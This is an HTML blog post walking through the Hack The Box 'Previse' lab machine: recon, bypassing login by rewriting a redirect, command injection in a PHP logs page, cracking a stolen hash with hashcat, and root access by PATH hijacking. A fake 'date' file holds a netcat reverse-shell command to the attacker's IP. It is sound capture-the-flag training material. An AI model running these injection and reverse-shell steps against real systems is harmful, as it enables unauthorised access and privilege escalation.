<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="First Day at HacktheboxRegister an account at Hackthebox, on yeah! Immediately go to Labs, in the machines tab, start to work on an easy challenge. Le">
    

    <!--Author-->
    
        <meta name="author" content="Ulysses">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="First Day at Hackthebox"/>
    

    <!--Open Graph Description-->
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="Secfilter"/>

    <!--Type page-->
    
        <meta property="og:type" content="article" />
    

    <!--Page Cover-->
    

    
        <meta name="twitter:card" content="summary" />
    
    
    

    <!-- Title -->
    
    <title>First Day at Hackthebox - Secfilter</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Google Analytics -->
    


<meta name="generator" content="Hexo 5.4.0"></head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about.html">
                    About
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    Categories
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact.html">
                    Contact
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2021/12/26/First-Day-at-Hackthebox/">
                First Day at Hackthebox
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2021-12-26</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <h1 id="First-Day-at-Hackthebox"><a href="#First-Day-at-Hackthebox" class="headerlink" title="First Day at Hackthebox"></a>First Day at Hackthebox</h1><p>Register an account at Hackthebox, on yeah! Immediately go to Labs, in the machines tab, start to work on an easy challenge. Let’s play with Previse!</p>
<h3 id="1-At-first-set-up-openvpn-in-Kali-linux"><a href="#1-At-first-set-up-openvpn-in-Kali-linux" class="headerlink" title="1. At first, set up openvpn in Kali linux."></a>1. At first, set up openvpn in Kali linux.</h3><p>Download openvpn configuration from Hackthebox</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219123302720.png" alt="image-20211219123302720"></p>
<p>Click “+” button at the left bottom corner, and choose “Imported a saved VPN configuration” in         connection type. Then select the .ovpn file downloaded from hackthebox. </p>
<h3 id="2-Basic-reconnanssis"><a href="#2-Basic-reconnanssis" class="headerlink" title="2. Basic reconnanssis"></a>2. Basic reconnanssis</h3><p>Target server is 10.10.11.104, my ip is 10.10.11.144</p>
<p>run nmap to scan the target</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219124054602.png" alt="image-20211219124054602"></p>
<p>open firefox and visit <a target="_blank" rel="noopener" href="http://10.10.11.104/">http://10.10.11.104</a></p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219124509885.png" alt="image-20211219124509885"></p>
<h3 id="3-start-sqlmap-to-try-some-luck"><a href="#3-start-sqlmap-to-try-some-luck" class="headerlink" title="3. start sqlmap to try some luck."></a>3. start sqlmap to try some luck.</h3><p>In burp proxy, save the request to a file request.txt</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211225132123082.png" alt="image-20211225132123082"></p>
<p>use sqlmap to scan for any sql injection possibilities.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -r request.txt -p username</span><br><span class="line">sqlmap -r request.txt -p username</span><br></pre></td></tr></table></figure>

<p>Unfortunately, nothing worked.</p>
<h3 id="4-Dirbuster-to-enumerate-other-directory-in-the-website"><a href="#4-Dirbuster-to-enumerate-other-directory-in-the-website" class="headerlink" title="4. Dirbuster to enumerate other directory in the website."></a>4. Dirbuster to enumerate other directory in the website.</h3><p>In put the target url and choose a wordlist.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219125241110.png" alt="image-20211219125241110"></p>
<p>Dirbuster found some page with 302 and 200 response code.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219125449150.png" alt="image-20211219125449150"></p>
<p>try the page with 200 response code, found that <a target="_blank" rel="noopener" href="http://10.10.11.104/nav.php">http://10.10.11.104/nav.php</a> could be visited as below. Click on the button, then redirect to login page.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219125729689.png" alt="image-20211219125729689"></p>
<h3 id="5-Use-Burp-to-do-some-traffic-analysis"><a href="#5-Use-Burp-to-do-some-traffic-analysis" class="headerlink" title="5. Use Burp to do some traffic analysis"></a>5. Use Burp to do some traffic analysis</h3><p>In Burp, the page <a target="_blank" rel="noopener" href="http://10.10.11.104/accounts.php">http://10.10.11.104/accounts.php</a> use 302 to redirect me to login.php, but the content of accounts.php has been served.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219130102039.png" alt="image-20211219130102039"></p>
<p>Intercept on the response to accounts.php, choose Do intercept-&gt;Response to this request. </p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219130703127.png" alt="image-20211219130703127"></p>
<p>In the response, choose 302 found to 200 OK. In this way, I could bypass the authentication and create a account!</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219131150764.png" alt="image-20211219131150764"></p>
<h3 id="6-In-the-website"><a href="#6-In-the-website" class="headerlink" title="6. In the website"></a>6. In the website</h3><p>Create user admin1111 and input a password, I could login the website. Go around the website, in the Files page, I could download “SITEBACKUP.ZIP”.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219131355435.png" alt="image-20211219131355435"></p>
<p>Download and unzip it, it looks like I have get the source code of the website as mentioned by the filename.  </p>
<p>In the config.php, I could find the mysql credential.    </p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211219132039691.png" alt="image-20211219132039691"></p>
<h3 id="7-In-the-server"><a href="#7-In-the-server" class="headerlink" title="7. In the server"></a>7. In the server</h3><p>Next step is how to build a session into the server to connect to mysql. One thing in the mind is that if there is any command injection vulnerability in the website. I go through the source code to check if there is any suspicious function has been called, for example, system, shell_exec, exec, proc_open, eval,<br>passthru, proc_open, expect_open, ssh2_exec, popen. </p>
<p>In logs.php, it seems promising to exploit the code below:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$output = exec(&quot;/usr/bin/python /opt/scripts/log_process.py &#123;$_POST[&#x27;delim&#x27;]&#125;&quot;);</span><br></pre></td></tr></table></figure>

<p>In Kali Linux, start listening on port 4444</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nlvp 4444</span><br></pre></td></tr></table></figure>

<p>In Burp, intercept on the request to <a target="_blank" rel="noopener" href="http://10.10.11.104/file_logs.php">http://10.10.11.104/file_logs.php</a>, in the request, inject reverse shell command</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211224222204057.png" alt="image-20211224222204057"></p>
<p>After send the command injection request to server, I could get connection from netcat client.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211224223548268.png" alt="image-20211224223548268"></p>
<p>Run command python -c ‘import pty; pty.spawn(“/bin/sh”)’ to get a sh shell connection, currently, I am login as www-data user</p>
<p>Connect mysql server with the user and password from config.php, login successfully! Browse through in the database, found the username and password in accounts table.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211224224223297.png" alt="image-20211224224223297"></p>
<p>Copy the hash to a file, use hashcat to crack it. Notice that there is a emoji in the password, bring some trouble when copying it. I copy it to a file in Windows at first, then transfer the file to Kali, use dos2unix to transfer the format.</p>
<p>hashcat -a 0 -m 500 hash.txt /usr/share/wordlists/rockyou.txt</p>
<p>Luckily, I could crack the hash and get the password for user m4lwhere. SSH connect with m4lwhere and input the password.  There is user.txt in directory /home/m4lwhere, and the flag is in user.txt.</p>
<h3 id="8-Privilege-Escalation"><a href="#8-Privilege-Escalation" class="headerlink" title="8. Privilege Escalation"></a>8. Privilege Escalation</h3><p>Now, I have get the m4lwhere user flag, next step is how to get root user flag.</p>
<p>Run command “sudo -ll” to check which command the currently user could run as root.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211225000646324.png" alt="image-20211225000646324"></p>
<p>As shown, I only have read and execution permission. And in access_backup.sh, it use gzip and date command.</p>
<p><img src="C:\Users\ulysses\AppData\Roaming\Typora\typora-user-images\image-20211225000812904.png" alt="image-20211225000812904"></p>
<p>Let us try a path injection. In the current folder /home/m4lwhere, run the code below to add currently folder to PATH environment variable.</p>
<p>export PATH=/home/m4lwhere/:$PATH</p>
<p>Then add an executable “date”(or “gzip” file, as access_backup.sh would execute both gzip and date) file to the current folder. In “date” file, reverse shell will give control to my server.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;nc 10.10.14.102 5555 -e /bin/bash&quot; &gt; date</span><br><span class="line"></span><br><span class="line">chmod +x date</span><br></pre></td></tr></table></figure>

<p>Then run command “sudo /opt/scripts/access_backup.sh”</p>
<p>Finally, in my kali control server, I could get root privilege. And in /root folder, the flag is root.txt.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211225131436150.png" alt="image-20211225131436150"></p>

    </div>

    

    
        <div class="post-tags">
            <i class="fa fa-tags" aria-hidden="true"></i>
            <a href="/tags/Hackthebox/">#Hackthebox</a>
        </div>
    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2021/12/26/First-Day-at-Hackthebox/">First Day at Hackthebox</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/12/19/hello-world/">Hello World</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://github.com/klugjo/hexo-theme-alpha-dust">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://twitter.com/?lang=en">
                            <span class="footer-icon-container">
                                <i class="fa fa-twitter"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.facebook.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-facebook"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.instagram.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-instagram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://dribbble.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-dribbble"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://telegram.org/">
                            <span class="footer-icon-container">
                                <i class="fa fa-telegram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.behance.net/">
                            <span class="footer-icon-container">
                                <i class="fa fa-behance"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://500px.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-500px"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:test@example.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->

<script src="/js/main.js"></script>


<!-- Disqus Comments -->



</body>

</html>